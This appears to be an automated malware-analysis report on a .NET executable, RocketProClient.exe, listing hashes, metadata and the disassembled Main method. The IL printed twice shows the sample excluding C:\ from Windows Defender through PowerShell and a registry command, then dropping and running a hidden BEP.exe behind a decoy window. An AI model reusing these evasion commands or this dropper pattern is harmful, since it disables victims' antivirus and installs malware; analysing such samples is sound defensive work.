Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | cc913323b3b90722eaf610f08ac59328
|
| Sha1 | aae84fdc6db7849742eefc118eef6bc2e8a939cd
|
| Sha256 | 2e8bb24568e3a668f6d6c102471923177a98c82ac081e07984c4b8f8aafdffe8
|
| Sha384 | c713e3929d9580ea7c2a57dccd03fcd7bf97ee46b30d8e000c236c74298c8e705aef56c87755e72f77eed630c1d28d02
|
| Sha512 | b30d6ca7d4b9e0ac46e8d9f5069f6205e0dce7b954f24d1f052d22a0c0a23847664a5a08277e859eb10ef642559cdbaef9d85e355b5bb6cd9a2544cbcbfa7a95
|
| SSDeep | 6144:/1cxbgERFWV2az6l3SyY1Y9Q3bFszXxNJQLJB/:/qRFWVPSY1WQ3bFs/JO
|
| TLSH | 704402A472A0D937C9AC0BF9A469871917F2A00B3322D6D4BC4A25DA5FE7F440750FB7
|
PeID
|
Name0 | Value |
|---|---|
| Module Name | RocketProClient.exe |
| Full Name | RocketProClient.exe |
| EntryPoint | System.Void RocketProClient.Program::Main() |
| Scope Name | RocketProClient.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | RocketProClient |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 96 |
| Main Method | System.Void RocketProClient.Program::Main() |
| Main IL Instruction Count | 38 |
| Main IL | ldstr C:\ stloc.0 <null> ldstr Add-MpPreference -ExclusionPath " ldloc.0 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void RocketProClient.Program::RunPowerShellCommand(System.String) ldstr reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\\" /t REG_DWORD /d 0 /f call System.Void RocketProClient.Program::RunCmdCommand(System.String) call System.Byte[] RocketProClient.Properties.Resources::get_BEP() stloc.1 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) ldloc.1 <null> call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_0075: call System.Void System.Windows.Forms.Application::EnableVisualStyles() pop <null> leave.s IL_0075: call System.Void System.Windows.Forms.Application::EnableVisualStyles() call System.Void System.Windows.Forms.Application::EnableVisualStyles() ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) newobj System.Void RocketProClient.WaitingForRocket::.ctor() call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form) ret <null> |
| Module Name | RocketProClient.exe |
| Full Name | RocketProClient.exe |
| EntryPoint | System.Void RocketProClient.Program::Main() |
| Scope Name | RocketProClient.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | RocketProClient |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.7.2 |
| Total Strings | 96 |
| Main Method | System.Void RocketProClient.Program::Main() |
| Main IL Instruction Count | 38 |
| Main IL | ldstr C:\ stloc.0 <null> ldstr Add-MpPreference -ExclusionPath " ldloc.0 <null> ldstr " call System.String System.String::Concat(System.String,System.String,System.String) call System.Void RocketProClient.Program::RunPowerShellCommand(System.String) ldstr reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\\" /t REG_DWORD /d 0 /f call System.Void RocketProClient.Program::RunCmdCommand(System.String) call System.Byte[] RocketProClient.Properties.Resources::get_BEP() stloc.1 <null> ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) ldloc.1 <null> call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) ldc.i4.6 <null> call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \BEP.exe call System.String System.String::Concat(System.String,System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> leave.s IL_0075: call System.Void System.Windows.Forms.Application::EnableVisualStyles() pop <null> leave.s IL_0075: call System.Void System.Windows.Forms.Application::EnableVisualStyles() call System.Void System.Windows.Forms.Application::EnableVisualStyles() ldc.i4.0 <null> call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean) newobj System.Void RocketProClient.WaitingForRocket::.ctor() call System.Void System.Windows.Forms.Application::Run(System.Windows.Forms.Form) ret <null> |
|
Name0 | Value |
|---|---|
| PDB Path | C:\Users\steff\source\repos\RocketProClient\RocketProClient\obj\Release\RocketProClient.pdb |
|
Name0 | Value | Location |
|---|---|---|
| PDB Path | C:\Users\steff\source\repos\RocketProClient\RocketProClient\obj\Release\RocketProClient.pdb |
cc913323b3b90722eaf610f08ac59328 |